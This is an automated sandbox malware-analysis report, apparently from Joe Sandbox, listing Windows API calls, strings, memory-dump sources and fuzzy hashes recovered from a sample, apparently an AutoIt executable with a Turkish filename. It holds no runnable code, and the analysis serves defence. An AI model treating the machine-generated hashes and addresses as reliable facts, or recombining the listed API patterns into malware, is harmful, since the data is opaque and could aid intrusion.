                                                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00218CFF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#%
                                                                                                                                    • API String ID: 1924731296-931395690
                                                                                                                                    • Opcode ID: e53ebbddb5192f25b8723f267602a2c9e6459d6450671a9e0408b63fafdd6e16
                                                                                                                                    • Instruction ID: eaa338c3b7a4fc1d04c1b552e3d2f2f3b98af2d861ee4b1e8d76c5b4e3c1247d
                                                                                                                                    • Opcode Fuzzy Hash: e53ebbddb5192f25b8723f267602a2c9e6459d6450671a9e0408b63fafdd6e16
                                                                                                                                    • Instruction Fuzzy Hash: A451AD71104300AFD704EF24DC9AFAA77E4FB98715F50062DF956A72E1CB709A64CBA2
                                                                                                                                    APIs
                                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001F33CF
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001F33F0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LoadString$_wcslen
                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                    • API String ID: 4099089115-3080491070
                                                                                                                                    • Opcode ID: 7b4f5b27b2f26000c7e2373d63662afc09db6d4c9b73b07c2a234e580ca38c56
                                                                                                                                    • Instruction ID: c3fcdc3e27ae808c69bdcf312f72043f36ef285da1760ab48cc87db1ede4400e
                                                                                                                                    • Opcode Fuzzy Hash: 7b4f5b27b2f26000c7e2373d63662afc09db6d4c9b73b07c2a234e580ca38c56
                                                                                                                                    • Instruction Fuzzy Hash: D1518B71900209BADF19EBA0DD46EFEB378AF25700F244065F515720A2EB352F68DF61
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                    • API String ID: 1256254125-769500911
                                                                                                                                    • Opcode ID: fba226d4e199a3c48d07a2944032446a0240552caf79a1adce78c78df30917e8
                                                                                                                                    • Instruction ID: 8019011aa8266c430be86afa5468d3273b14b881d4e671f5123f5f4bf51ddc4a
                                                                                                                                    • Opcode Fuzzy Hash: fba226d4e199a3c48d07a2944032446a0240552caf79a1adce78c78df30917e8
                                                                                                                                    • Instruction Fuzzy Hash: CB41F832A084679BCB206F7EC8D05BFB7A5AFA9B54B254129E421DB284E731CD81C790
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 001F53A0
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 001F5416
                                                                                                                                    • GetLastError.KERNEL32 ref: 001F5420
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 001F54A7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                                    • Opcode ID: bb151c995089ac128b8b90b30c19924de317f38e526157891ccc6b5912a49310
                                                                                                                                    • Instruction ID: c5a5f6117b0fc2cf678851a97a5c58040688915d704256750ef1cb6f4a59ac5e
                                                                                                                                    • Opcode Fuzzy Hash: bb151c995089ac128b8b90b30c19924de317f38e526157891ccc6b5912a49310
                                                                                                                                    • Instruction Fuzzy Hash: 5731C375A00609DFC714DF68C488ABABBB5FF55305F148069E706CB292EB31DD82CBA1
                                                                                                                                    APIs
                                                                                                                                    • CreateMenu.USER32 ref: 00213C79
                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00213C88
                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00213D10
                                                                                                                                    • IsMenu.USER32(?), ref: 00213D24
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00213D2E
                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00213D5B
                                                                                                                                    • DrawMenuBar.USER32 ref: 00213D63
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                    • String ID: 0$F
                                                                                                                                    • API String ID: 161812096-3044882817
                                                                                                                                    • Opcode ID: ef0945e33315eb2060a3f8f13ff91aebd1e9e097a5425b89a7ed6be907f14bf7
                                                                                                                                    • Instruction ID: 83bb7159ab89f38b2080ec90ad84c73cb1a86a69d32b079eb358d2d43593144d
                                                                                                                                    • Opcode Fuzzy Hash: ef0945e33315eb2060a3f8f13ff91aebd1e9e097a5425b89a7ed6be907f14bf7
                                                                                                                                    • Instruction Fuzzy Hash: 25418C78A1120AAFDB14CF64E848BDA77F6FF59304F144029E906A7360DB70AA20CF94
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00213A9D
                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00213AA0
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00213AC7
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00213AEA
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00213B62
                                                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00213BAC
                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00213BC7
                                                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00213BE2
                                                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00213BF6
                                                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00213C13
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                    • Opcode ID: 560edb3d12467b4a541e3b038a7ed3f5856a38776612af879b975ba9a8ab81f2
                                                                                                                                    • Instruction ID: 8a4f571888d6f2bd768510d1b332de2157054f4f1472f98cab789013ccf1c241
                                                                                                                                    • Opcode Fuzzy Hash: 560edb3d12467b4a541e3b038a7ed3f5856a38776612af879b975ba9a8ab81f2
                                                                                                                                    • Instruction Fuzzy Hash: EF618975900248AFDB10DFA8CC85EEE77F9EB19314F10009AFA15A72A1D770AE95DB50
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 001EB151
                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB165
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 001EB16C
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB17B
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 001EB18D
                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB1A6
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB1B8
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB1FD
                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB212
                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB21D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                    • Opcode ID: adbf990ac28ed89bd37485fbeccea16aa84b71f23df3899829989020becd46de
                                                                                                                                    • Instruction ID: 846a2c9e410ab4e33cdbb1a83fbff6ca0465f5e364cb7f16604b4452015b03c8
                                                                                                                                    • Opcode Fuzzy Hash: adbf990ac28ed89bd37485fbeccea16aa84b71f23df3899829989020becd46de
                                                                                                                                    • Instruction Fuzzy Hash: F131AC79544745BFDB10DF25FC8CBBE7BA9AF60352F208014FA01D6190DBB4AA008F68
                                                                                                                                    APIs
                                                                                                                                    • _free.LIBCMT ref: 001B2C94
                                                                                                                                      • Part of subcall function 001B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000), ref: 001B29DE
                                                                                                                                      • Part of subcall function 001B29C8: GetLastError.KERNEL32(00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000,00000000), ref: 001B29F0
                                                                                                                                    • _free.LIBCMT ref: 001B2CA0
                                                                                                                                    • _free.LIBCMT ref: 001B2CAB
                                                                                                                                    • _free.LIBCMT ref: 001B2CB6
                                                                                                                                    • _free.LIBCMT ref: 001B2CC1
                                                                                                                                    • _free.LIBCMT ref: 001B2CCC
                                                                                                                                    • _free.LIBCMT ref: 001B2CD7
                                                                                                                                    • _free.LIBCMT ref: 001B2CE2
                                                                                                                                    • _free.LIBCMT ref: 001B2CED
                                                                                                                                    • _free.LIBCMT ref: 001B2CFB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                    • Opcode ID: e86c4a864dfde6dfad2a1f53aec72ae100cafa97669b073034b21b809b2e1e5d
                                                                                                                                    • Instruction ID: 21fed75265b7dbf4cc559d29f62ca1f03e3a5af7714f3a2d318c181da8d40b90
                                                                                                                                    • Opcode Fuzzy Hash: e86c4a864dfde6dfad2a1f53aec72ae100cafa97669b073034b21b809b2e1e5d
                                                                                                                                    • Instruction Fuzzy Hash: 7111A476100118BFCB02EF94D982CDD3BA5FF19354F4148A5FA489F222DB31EE549B90
                                                                                                                                    APIs
                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00181459
                                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 001814F8
                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 001816DD
                                                                                                                                    • DestroyWindow.USER32(?), ref: 001C24B9
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 001C251E
                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 001C254B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                    • String ID: close all
                                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                                    • Opcode ID: 69524a304921dee6db42fdea15e5627c117c2437916512022e56383919e8975d
                                                                                                                                    • Instruction ID: 890ee80f46db83a07a867772a06f9d96a67a23b51f302f815ba2086ac78eca79
                                                                                                                                    • Opcode Fuzzy Hash: 69524a304921dee6db42fdea15e5627c117c2437916512022e56383919e8975d
                                                                                                                                    • Instruction Fuzzy Hash: FED127327012129FCB29EF14D499F69F7A4BF25700F2542ADE84AAB251DB30EE12CF50
                                                                                                                                    APIs
                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00185C7A
                                                                                                                                      • Part of subcall function 00185D0A: GetClientRect.USER32(?,?), ref: 00185D30
                                                                                                                                      • Part of subcall function 00185D0A: GetWindowRect.USER32(?,?), ref: 00185D71
                                                                                                                                      • Part of subcall function 00185D0A: ScreenToClient.USER32(?,?), ref: 00185D99
                                                                                                                                    • GetDC.USER32 ref: 001C46F5
                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001C4708
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 001C4716
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 001C472B
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 001C4733
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001C47C4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                    • String ID: U
                                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                                    • Opcode ID: f6b82cd2c0d95aae58dd929ad2083e23ff2f1988a4f6e69a93bfca2c187ed2d2
                                                                                                                                    • Instruction ID: 7dd9931d4c52fd8be4d5a4d6eb12da0f31e67be7c0600dc9ec2b8a56cd2479fa
                                                                                                                                    • Opcode Fuzzy Hash: f6b82cd2c0d95aae58dd929ad2083e23ff2f1988a4f6e69a93bfca2c187ed2d2
                                                                                                                                    • Instruction Fuzzy Hash: D171DA34404204DFCF259F64C994FEA3BB6FF6A324F244269ED555A2AAC730C991DF60
                                                                                                                                    APIs
                                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001F35E4
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                    • LoadStringW.USER32(00252390,?,00000FFF,?), ref: 001F360A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LoadString$_wcslen
                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                    • API String ID: 4099089115-2391861430
                                                                                                                                    • Opcode ID: 80b47fe4de2439fc46c7c27eccbb64c9a029ee2e5135605f12ec191b0ec92e65
                                                                                                                                    • Instruction ID: c9520b348b8593a0e5a40bd0316dd3f19116c5164778a538ef972ea34b28a837
                                                                                                                                    • Opcode Fuzzy Hash: 80b47fe4de2439fc46c7c27eccbb64c9a029ee2e5135605f12ec191b0ec92e65
                                                                                                                                    • Instruction Fuzzy Hash: AB517D7180020ABADF14FBA0DC46EFEBB78AF25300F184165F615721A1EB311B99DFA1
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001FC272
                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001FC29A
                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001FC2CA
                                                                                                                                    • GetLastError.KERNEL32 ref: 001FC322
                                                                                                                                    • SetEvent.KERNEL32(?), ref: 001FC336
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 001FC341
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                                    • Opcode ID: 8fa7bcb50413002c58c0ceae5abc5f2a38447e9c8efe39730b567041d99bf861
                                                                                                                                    • Instruction ID: 5f642b9ac18ecf5b4a8bc45a8d2deebbcb94bbefd814d1b0f9241d99c06d6d13
                                                                                                                                    • Opcode Fuzzy Hash: 8fa7bcb50413002c58c0ceae5abc5f2a38447e9c8efe39730b567041d99bf861
                                                                                                                                    • Instruction Fuzzy Hash: EF31AEB560020CAFD7219F649E88ABBBBFCFB59784F14851EF546D2240DB30DD05ABA1
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001C3AAF,?,?,Bad directive syntax error,0021CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001E98BC
                                                                                                                                    • LoadStringW.USER32(00000000,?,001C3AAF,?), ref: 001E98C3
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001E9987
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                    • API String ID: 858772685-4153970271
                                                                                                                                    • Opcode ID: b3d803915e041b8af871d94a2788790acdba58401fda4be2ad408bf786f44f29
                                                                                                                                    • Instruction ID: 9335af832397d34f3dfe474677ad333fffde8ce743db6e228c657d7d2af63f6f
